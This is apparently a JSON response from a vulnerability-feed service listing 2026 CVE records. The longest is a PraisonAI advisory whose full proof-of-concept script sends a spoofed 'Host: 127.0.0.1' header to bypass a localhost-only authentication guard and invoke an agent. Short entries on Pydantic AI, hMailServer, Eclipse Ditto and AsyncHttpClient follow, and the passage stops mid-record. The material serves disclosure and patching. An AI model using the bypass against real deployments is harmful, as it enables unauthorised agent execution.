{"success":true,"data":{"threats":[{"id":"a915caa5-a480-4573-87f1-f0337f33dcb1","slug":"cve-2026-61435","externalId":"GHSA-2gpf-2492-q9jh","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Call API localhost-only authentication bypass via spoofed Host header","description":"# Call API localhost-only authentication bypass via spoofed Host header\n\n## Summary\n\nPraisonAI's patched `PRAISONAI_CALL_AUTH=disabled` safeguard for the n8n/call agent invocation API can be bypassed with a spoofed `Host: 127.0.0.1` header, allowing an unauthenticated network caller to list and invoke registered agents when the service is reachable and the opt-out is enabled.\n\n## Technical Details\n\nThe affected code is `src/praisonai/praisonai/api/agent_invoke.py`. `verify_token()` is used as a FastAPI dependency for the `/api/v1/agents` routes, including `POST /api/v1/agents/{agent_id}/invoke`. Current code no longer unconditionally skips authentication when `PRAISONAI_CALL_AUTH=disabled`; it tries to allow that opt-out only for localhost binding:\n\n```python\n_LOCALHOST_HOSTS = frozenset({'127.0.0.1', 'localhost', '::1'})\n\ndef _bind_host_from_request(request: Request) -> str:\n    host = getattr(getattr(request, 'url', None), 'hostname', None)\n    return host or os.getenv('PRAISONAI_CALL_BIND_HOST', '127.0.0.1')\n\nasync def verify_token(request: Request, authorization: Optional[str] = Header(None)) -> None:\n    if _call_auth_disabled():\n        bind_host = _bind_host_from_request(request)\n        if bind_host not in _LOCALHOST_HOSTS:\n            raise HTTPException(\n                status_code=503,\n                detail=\"PRAISONAI_CALL_AUTH=disabled is only permitted for localhost binding\",\n            )\n        return\n```\n\nThe violated invariant is that \"localhost binding\" must be a server-owned startup or socket property. The implementation instead reads `request.url.hostname`, which is derived from the HTTP Host header for the current request. A remote caller can therefore send `Host: 127.0.0.1` and make the disabled-auth guard believe the request is for a localhost-bound service.\n\nThe protected sink is agent execution. After `verify_token()` returns, `invoke_agent()` retrieves the registered agent and calls `agent.astart(request.message)` or `agent.start(request.message)`. The same router is mounted by the PraisonAI serve feature, which imports `praisonai.api.agent_invoke`, includes `agent_invoke.router`, and registers YAML agents into the same registry.\n\nThis is not a default-configuration exposure claim. The deployment must enable `PRAISONAI_CALL_AUTH=disabled` and the API must be reachable over the network. The issue is that the patched safeguard intended to constrain that opt-out to localhost can be bypassed by client-controlled request metadata.\n\n## PoV\n\nthe PoV builds an in-process FastAPI app with the real `agent_invoke.router`, registers a harmless stub agent, and sends three no-token requests. The important input is the final request: it is modeled as an external client but sends `Host: 127.0.0.1`.\n\n```python\ndisabled_client = TestClient(app, base_url=\"http://external.example\")\n\nexternal_host = disabled_client.get(\n    \"/api/v1/agents\",\n    headers={\"host\": \"external.example\"},\n)\nspoofed_localhost_list = disabled_client.get(\n    \"/api/v1/agents\",\n    headers={\"host\": \"127.0.0.1\"},\n)\nspoofed_localhost_invoke = disabled_client.post(\n    \"/api/v1/agents/pov-agent/invoke\",\n    headers={\"host\": \"127.0.0.1\"},\n    json={\"message\": \"host-header-bypass\"},\n)\n```\n\nExpected secure behavior is for both no-token requests in disabled-auth mode to be rejected when the service is not actually loopback-only. Actual behavior rejects `Host: external.example` with `503`, but accepts the spoofed localhost Host with `200` and invokes the stub agent.\n\nThe complete PoV script is in Appendix A.\n\n## PoC\n\nRun from a PraisonAI checkout with the Appendix A script saved as `pov_call_auth_host_spoof.py`:\n\n```bash\ngit checkout v4.6.62\nuv run --with fastapi --with httpx python pov_call_auth_host_spoof.py .\n```\n\nObserved `v4.6.62` output:\n\n```json\n{\n  \"disabled_auth_external_host_status\": 503,\n  \"disabled_auth_spoofed_localhost_invoke_status\": 200,\n  \"disabled_auth_spoofed_localhost_list_status\": 200,\n  \"fail_closed_without_token_status\": 503,\n  \"repo_head\": \"2a855c470077c7d2e2479a575f7ef7f548d51c33\",\n  \"spoofed_localhost_invoke_body\": {\n    \"metadata\": {\n      \"agent_id\": \"pov-agent\",\n      \"message_length\": 18,\n      \"response_length\": 33\n    },\n    \"result\": \"stub-agent-ran:host-header-bypass\",\n    \"session_id\": \"default\",\n    \"status\": \"success\"\n  },\n  \"stub_agent_calls\": [\n    \"host-header-bypass\"\n  ],\n  \"vulnerable\": true\n}\n```\n\nRun the same script against current main:\n\n```bash\ngit checkout 846568c7a5d8ce9e71e56e4c213f027c04909753\nuv run --with fastapi --with httpx python pov_call_auth_host_spoof.py .\n```\n\nObserved current-head output:\n\n```json\n{\n  \"disabled_auth_external_host_status\": 503,\n  \"disabled_auth_spoofed_localhost_invoke_status\": 200,\n  \"disabled_auth_spoofed_localhost_list_status\": 200,\n  \"fail_closed_without_token_status\": 503,\n  \"repo_head\": \"846568c7a5d8ce9e71e56e4c213f027c04909753\",\n  \"spoofed_localhost_invoke_body\": {\n    \"metadata\": {\n      \"agent_id\": \"pov-agent\",\n      \"message_length\": 18,\n      \"response_length\": 33\n    },\n    \"result\": \"stub-agent-ran:host-header-bypass\",\n    \"session_id\": \"default\",\n    \"status\": \"success\"\n  },\n  \"stub_agent_calls\": [\n    \"host-header-bypass\"\n  ],\n  \"vulnerable\": true\n}\n```\n\nThe negative controls are the first two status fields. With default authentication and no token, the API fails closed with `503`. With `PRAISONAI_CALL_AUTH=disabled`, an ordinary external Host is also rejected with `503`. Only the spoofed localhost Host passes the guard and reaches agent execution.\n\n## Impact\n\nAn unauthenticated caller who can reach a PraisonAI call/serve API with `PRAISONAI_CALL_AUTH=disabled` can bypass the intended localhost-only restriction by setting `Host: 127.0.0.1`. The PoV demonstrates both agent listing and direct invocation of a registered agent through `/api/v1/agents/{agent_id}/invoke`.\n\nImpact depends on the registered agents. In realistic deployments, agents may have tools, private context, workflow integrations, browser/file/API access, or paid model access. The same dependency also protects other agent registry routes, so the bypass undermines the access-control boundary for the mounted `/api/v1/agents` API family.\n\nSuggested CWE: `CWE-287` Improper Authentication and `CWE-346` Origin Validation Error, with `CWE-306` Missing Authentication for Critical Function also applicable to the bypassed protected action.\n\nSuggested CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N` (8.2). Confidentiality is scored Low because the PoV proves agent listing and invocation; higher confidentiality impact depends on deployed agents and their private context.\n\n## Suggested Fix\n\nDo not derive bind safety from `Request.url`, the HTTP Host header, or any request-header-derived value. If `PRAISONAI_CALL_AUTH=disabled` remains supported, decide whether it is allowed at startup from server-owned configuration, such as the actual configured bind host passed to Uvicorn or the serving command, and refuse to start in disabled-auth mode when the configured bind host is not loopback.\n\nConsider removing the HTTP auth opt-out entirely for network routes, or replacing it with an explicit local-development mode that is only available when the process is bound to `127.0.0.1`, `localhost`, or `::1`.\n\nRegression tests should exercise real ASGI requests rather than only synthetic request objects. Include a test where `PRAISONAI_CALL_AUTH=disabled`, the modeled server configuration is non-loopback, and the request sends `Host: 127.0.0.1`; the expected result should be rejection before any agent list or invoke handler runs.\n\n## Affected Package/Versions\n\nAffected package: `praisonai` on PyPI.\n\nConfirmed affected:\n\n- `v4.6.62` at `2a855c470077c7d2e2479a575f7ef7f548d51c33`\n- current main at `846568c7a5d8ce9e71e56e4c213f027c04909753`, version file still reporting `4.6.62`\n\n`v4.6.60` had the older unconditional `PRAISONAI_CALL_AUTH=disabled` bypass and is covered by a different public advisory. This report is for the patched guard shape present in `v4.6.62` and current main. If `v4.6.61` contains the same Host-derived guard, the affected lower bound likely starts there, but I could not confirm that tag locally.\n\nFixed version: unknown.\n\n## Advisory History\n\nI checked the repository advisory list available through GitHub and found adjacent but distinct advisories:\n\n- `GHSA-86qc-r5v2-v6x6`: call server unauthenticated agent listing/invocation/deletion when `CALL_SERVER_TOKEN` is unset in older releases. Current code fails closed when no token is configured; this report requires the patched `PRAISONAI_CALL_AUTH=disabled` localhost guard and a spoofed Host header.\n- `GHSA-8ccj-p46r-jwqq`: `PRAISONAI_CALL_AUTH=disabled` unconditionally disabled authentication in older releases and is listed as patched in `>= 4.6.61`. This report shows `v4.6.62` and current main are still bypassable through the new guard because the guard trusts `request.url.hostname`.\n- `GHSA-vmf9-xx9w-86wx`: legacy SSE MCP transport accepts attacker Host/Origin and exposes registered tools through `praisonaiagents.mcp.ToolsMCPServer.run_sse()`, `/sse`, and `/messages/`. That advisory affects `praisonaiagents >= 0.6.0, < 1.6.58` and `praisonai >= 3.10.0, < 4.6.58`, with patches listed as `praisonaiagents >= 1.6.59` and `praisonai >= 4.6.59`. This report targets a different package call path in `praisonai.api.agent_invoke.verify_token()` and `/api/v1/agents/{agent_id}/invoke`, confirmed in `praisonai v4.6.62` and current main after the GHSA-vmf9 patched range. The preconditions are also different: GHSA-vmf9 is a browser/DNS-rebinding style Host/Origin issue against a local or internal legacy SSE MCP server, while this report requires `PRAISONAI_CALL_AUTH=disabled` on the call/n8n agent API and bypasses its localhost-only opt-out guard with `Host: 127.0.0.1`; no browser Origin, DNS rebinding setup, SSE transport, or MCP tool server is involved.\n- `GHSA-x8cv-xmq7-p8xp`: `AgentTeam.launch()` unauthenticated API. That advisory covers `praisonaiagents` `AgentTeam.launch()` routes, not `praisonai.api.agent_invoke.verify_token()`.\n- `GHSA-5qw8-f2g9-ff29`: Recipe server Typer command bypasses a non-localhost authentication guard. That is a different server and CLI path. This report targets the call API's Host-derived guard input.\n\nNo advisory I found describes Host-header spoofing against the patched `PRAISONAI_CALL_AUTH=disabled` localhost guard in `praisonai.api.agent_invoke`.\n\n## References\n\n- `src/praisonai/praisonai/api/agent_invoke.py`\n- `src/praisonai/praisonai/cli/features/serve.py`\n- `GHSA-86qc-r5v2-v6x6`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-86qc-r5v2-v6x6\n- `GHSA-8ccj-p46r-jwqq`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8ccj-p46r-jwqq\n- `GHSA-vmf9-xx9w-86wx`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vmf9-xx9w-86wx\n- `GHSA-x8cv-xmq7-p8xp`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x8cv-xmq7-p8xp\n- `GHSA-5qw8-f2g9-ff29`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-5qw8-f2g9-ff29\n\n## Appendix A - Full PoV Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"PoV for PraisonAI call API Host-header localhost guard bypass.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib\nimport json\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import Any\n\n\ndef _repo_root() -> Path:\n    if len(sys.argv) == 2:\n        return Path(sys.argv[1]).resolve()\n    return Path.cwd().resolve()\n\n\ndef _load_agent_invoke(repo_root: Path, auth_disabled: bool):\n    os.environ.pop(\"CALL_SERVER_TOKEN\", None)\n    if auth_disabled:\n        os.environ[\"PRAISONAI_CALL_AUTH\"] = \"disabled\"\n    else:\n        os.environ.pop(\"PRAISONAI_CALL_AUTH\", None)\n\n    package_root = repo_root / \"src\" / \"praisonai\"\n    if not package_root.exists():\n        raise SystemExit(f\"missing PraisonAI package root: {package_root}\")\n    package_root_s = str(package_root)\n    if package_root_s not in sys.path:\n        sys.path.insert(0, package_root_s)\n\n    import praisonai.api.agent_invoke as agent_invoke\n\n    agent_invoke = importlib.reload(agent_invoke)\n    agent_invoke._agent_registry.clear()\n    return agent_invoke\n\n\nclass StubAgent:\n    def __init__(self) -> None:\n        self.calls: list[str] = []\n\n    def start(self, message: str) -> str:\n        self.calls.append(message)\n        return f\"stub-agent-ran:{message}\"\n\n\ndef _make_client(agent_invoke: Any):\n    from fastapi import FastAPI\n    from fastapi.testclient import TestClient\n\n    app = FastAPI()\n    app.include_router(agent_invoke.router)\n    return TestClient(app, base_url=\"http://external.example\")\n\n\ndef main() -> int:\n    repo_root = _repo_root()\n\n    fail_closed_mod = _load_agent_invoke(repo_root, auth_disabled=False)\n    fail_closed_client = _make_client(fail_closed_mod)\n    fail_closed = fail_closed_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"127.0.0.1\"},\n    )\n\n    disabled_mod = _load_agent_invoke(repo_root, auth_disabled=True)\n    agent = StubAgent()\n    disabled_mod.register_agent(\"pov-agent\", agent)\n    disabled_client = _make_client(disabled_mod)\n\n    external_host = disabled_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"external.example\"},\n    )\n    spoofed_localhost_list = disabled_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"127.0.0.1\"},\n    )\n    spoofed_localhost_invoke = disabled_client.post(\n        \"/api/v1/agents/pov-agent/invoke\",\n        headers={\"host\": \"127.0.0.1\"},\n        json={\"message\": \"host-header-bypass\"},\n    )\n\n    result = {\n        \"repo_head\": _git(repo_root, \"rev-parse\", \"HEAD\"),\n        \"fail_closed_without_token_status\": fail_closed.status_code,\n        \"disabled_auth_external_host_status\": external_host.status_code,\n        \"disabled_auth_spoofed_localhost_list_status\": spoofed_localhost_list.status_code,\n        \"disabled_auth_spoofed_localhost_invoke_status\": spoofed_localhost_invoke.status_code,\n        \"spoofed_localhost_invoke_body\": _safe_json(spoofed_localhost_invoke),\n        \"stub_agent_calls\": agent.calls,\n    }\n\n    expected = (\n        fail_closed.status_code == 503\n        and external_host.status_code == 503\n        and spoofed_localhost_list.status_code == 200\n        and spoofed_localhost_invoke.status_code == 200\n        and agent.calls == [\"host-header-bypass\"]\n    )\n    result[\"vulnerable\"] = expected\n    print(json.dumps(result, indent=2, sort_keys=True))\n    return 0 if expected else 1\n\n\ndef _safe_json(response: Any) -> Any:\n    try:\n        return response.json()\n    except Exception:\n        return response.text\n\n\ndef _git(repo_root: Path, *args: str) -> str:\n    import subprocess\n\n    return subprocess.check_output(\n        [\"git\", \"-C\", str(repo_root), *args],\n        text=True,\n        stderr=subprocess.DEVNULL,\n    ).strip()\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```","cveId":"CVE-2026-61435","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N","severity":"high","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-287","CWE-306","CWE-346"],"tags":["osv","osv:ghsa-2gpf-2492-q9jh","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-2gpf-2492-q9jh","type":"advisory","title":"OSV GHSA-2gpf-2492-q9jh"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2gpf-2492-q9jh","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61435","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62174","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/2a855c470077c7d2e2479a575f7ef7f548d51c33","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/846568c7a5d8ce9e71e56e4c213f027c04909753","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-authentication-bypass-via-host-header-spoofing","type":"other","title":"OSV web"}],"epssScore":0.00685,"epssPercentile":0.51118,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:36:26.000Z","addedAt":"2026-10-08T21:08:30.957Z","updatedAt":"2026-10-08T21:08:30.957Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61435","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61435","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-2gpf-2492-q9jh"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-2gpf-2492-q9jh"}]},{"id":"d003fe6e-5605-45bf-a762-a0bee1b5d803","slug":"cve-2026-107295","externalId":"CVE-2026-107295","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107295 — Pydantic AI is a Python agent framework for building applications and workflows with Generative AI.","description":"Pydantic AI is a Python agent framework for building applications and workflows with Generative AI. From 1.34.0 until 1.107.4 and 2.28.0, the Agent.to_web() and clai web development chat endpoint has missing request content-type validation. A website visited by a developer can submit a browser-compatible request to a loopback-hosted chat server, causing the served agent to run and execute tools with the privileges and credentials of the local process; client-relayed approval decisions also leave requires_approval=True tools exposed. Binding to localhost does not prevent a browser page from reaching the loopback address. This issue is fixed in versions 1.107.4 and 2.28.0.","cveId":"CVE-2026-107295","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L","severity":"high","vendor":"PyPI","product":"pydantic-ai","affectedVersions":["pkg:pypi/pydantic-ai >= 1.34.0, < 1.107.4","pkg:pypi/pydantic-ai >= 2.0.0b1, < 2.28.0","pkg:pypi/pydantic-ai-slim >= 1.34.0, < 1.107.4","pkg:pypi/pydantic-ai-slim >= 2.0.0b1, < 2.28.0"],"cwes":["CWE-352","CWE-346"],"tags":["nvd","status:received","osv","osv:ghsa-h4xc-3qfq-jf93","ecosystem:pypi","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/pydantic/pydantic-ai/commit/d2690201a1834005d382dbf5c47e0ed94ef8bf46","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/commit/dd2abbdfa029c9ad138e7cc0edd2eaeaf9ed69c0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/pull/7382","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/pull/7383","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/releases/tag/v1.107.4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/releases/tag/v2.28.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/security/advisories/GHSA-h4xc-3qfq-jf93","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-h4xc-3qfq-jf93","type":"advisory","title":"OSV GHSA-h4xc-3qfq-jf93"},{"url":"https://github.com/pydantic/pydantic-ai","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T17:17:15.237Z","addedAt":"2026-10-08T18:39:31.716Z","updatedAt":"2026-10-08T21:05:51.175Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107295","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107295","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-H4XC-3QFQ-JF93"}]},{"id":"02f6cccb-77b7-4f1c-8d5d-2978bcec127b","slug":"cve-2026-107292","externalId":"CVE-2026-107292","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107292 — Pydantic AI is a Python agent framework for building applications and workflows with Generative AI.","description":"Pydantic AI is a Python agent framework for building applications and workflows with Generative AI. From 1.34.0 until 2.30.0, the Agent.to_web() and clai web development chat server does not validate the Host header, allowing a website visited by a developer to use DNS rebinding to reach a loopback-hosted agent as a same-origin service. The hostile page can read the served UI and submit chat requests that execute agent tools with the local process's privileges and credentials, causing data disclosure or unwanted side effects. Binding to localhost, Origin checks, and CSRF tokens do not prevent the same-origin DNS rebinding path. This issue is fixed in versions 1.107.5 and 2.30.0.","cveId":"CVE-2026-107292","cvssScore":6.4,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:L","severity":"medium","vendor":"PyPI","product":"pydantic-ai","affectedVersions":["pkg:pypi/pydantic-ai >= 1.34.0, < 1.107.5","pkg:pypi/pydantic-ai >= 2.0.0b1, < 2.30.0","pkg:pypi/pydantic-ai-slim >= 1.34.0, < 1.107.5","pkg:pypi/pydantic-ai-slim >= 2.0.0b1, < 2.30.0"],"cwes":["CWE-346","CWE-350"],"tags":["nvd","status:received","osv","osv:ghsa-q2xc-rrxj-58x9","ecosystem:pypi","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/pydantic/pydantic-ai/commit/394cc1d31656620704a703a2daed752afa5135fe","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/commit/871c7aeec5dfed2138655ccbccbf15c6d763bae7","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/pull/7437","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/pull/7438","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/releases/tag/v1.107.5","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/releases/tag/v2.30.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/pydantic/pydantic-ai/security/advisories/GHSA-q2xc-rrxj-58x9","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-q2xc-rrxj-58x9","type":"advisory","title":"OSV GHSA-q2xc-rrxj-58x9"},{"url":"https://github.com/pydantic/pydantic-ai","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T17:17:14.770Z","addedAt":"2026-10-08T18:39:31.693Z","updatedAt":"2026-10-08T21:05:51.105Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107292","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107292","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-Q2XC-RRXJ-58X9"}]},{"id":"11b29b1f-c267-45af-b7f6-bf8a19dd4923","slug":"cve-2026-104659","externalId":"CVE-2026-104659","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104659 — Missing Host header validation and missing throttling of failed administrator sign-ins in the REST API listener of Progressive Robot hMailServer 6.…","description":"Missing Host header validation and missing throttling of failed administrator sign-ins in the REST API listener of Progressive Robot hMailServer 6.0.0 through 6.3.5 allow a remote attacker to brute-force the server administrator's password through the administrator's own browser by DNS rebinding. The listener, which is off by default and bound to the loopback when enabled, answered requests whatever their Host header named, and a failed sign-in with the administrator's password from the loopback was neither auto-banned nor delayed. A web page whose host name the attacker rebinds to 127.0.0.1, opened in a browser on the server, can therefore send authenticated requests to the listener, read the answers and try administrator passwords at full speed until one is accepted, giving the attacker full administrative control of the mail server.","cveId":"CVE-2026-104659","cvssScore":7.5,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://gitlab.com/hmailserver/hmailserver/-/releases/v6.3.6","type":"advisory","title":"cve@gitlab.com"},{"url":"https://gitlab.com/hmailserver/hmailserver/-/work_items/57","type":"advisory","title":"cve@gitlab.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T11:16:44.013Z","addedAt":"2026-10-08T12:39:41.261Z","updatedAt":"2026-10-08T23:06:37.503Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104659","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104659","note":"authoritative record"}]},{"id":"c5b3f807-3bcf-497d-afe2-f0f0027a018e","slug":"cve-2026-107503","externalId":"CVE-2026-107503","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107503 — Unvalidated environments URL allows OAuth authorization code + PKCE verifier theft and account takeover via injected OIDC authority in Ditto Explor…","description":"Unvalidated environments URL allows OAuth authorization code + PKCE verifier theft and account takeover via injected OIDC authority in Ditto Explorer in Eclipse Ditto Ditto Explorer [3.6.0,3.9.7] allows a craft link set an attacker-controlled OIDC authority with autoSso enabled. The UI then automatically starts a login at the genuine identity provider but exchanges the returned authorization code together with its PKCE code_verifier at an attacker-controlled token endpoint. This lets the attacker redeem the code for the victim's access and refresh tokens. Alternatively, an attacker-controlled api_uri causes the UI to send the victim's bearer token or Basic credentials to the attacker. Because the configuration is persisted, later visits to the UI without the crafted link repeat the token theft.","cveId":"CVE-2026-107503","cvssScore":7.1,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-15","CWE-346","CWE-522"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/eclipse-ditto/ditto/security/advisories/GHSA-8767-g5qv-9jcf","type":"advisory","title":"emo@eclipse.org"},{"url":"https://gitlab.eclipse.org/security/cve-assignment/-/work_items/380","type":"advisory","title":"emo@eclipse.org"},{"url":"https://gitlab.eclipse.org/security/vulnerability-reports/-/work_items/1207","type":"advisory","title":"emo@eclipse.org"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T10:17:08.457Z","addedAt":"2026-10-08T10:39:34.980Z","updatedAt":"2026-10-08T21:05:47.863Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107503","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107503","note":"authoritative record"}]},{"id":"1eb11baa-8f88-422e-88a6-86587d93c8c9","slug":"cve-2026-107281","externalId":"CVE-2026-107281","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107281 — The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.","description":"The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Prior to 3.0.13 and 2.16.1, the HTTP/1.1 connection-pool key excludes the authenticated principal for connection-oriented NTLM and Negotiate authentication. A pooled socket authenticated for one request can be reused by a request carrying another principal, and the server executes that later request as the first identity. Basic and Digest are not affected because they authenticate each request. This issue is fixed in versions 3.0.13 and 2.16.1.","cveId":"CVE-2026-107281","cvssScore":7.6,"cvssVector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-346","CWE-863"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/AsyncHttpClient/async-http-client/commit/73813babf51231ee79f7da4f07b777f19f48d34d","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/commit/83e552e64cabab2119addb6b47f7c6482997c94e","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-2.16.1","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.13","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-vvp4-63h8-v5pm","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00171,"epssPercentile":0.05855,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T22:17:03.980Z","addedAt":"2026-10-07T22:39:36.808Z","updatedAt":"2026-10-08T21:05:45.106Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107281","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107281","note":"authoritative record"}]},{"id":"211b9c97-7fb8-4ffb-993b-ffd36a7cc765","slug":"cve-2026-107230","externalId":"CVE-2026-107230","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107230 — The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.","description":"The AsyncHttpClient 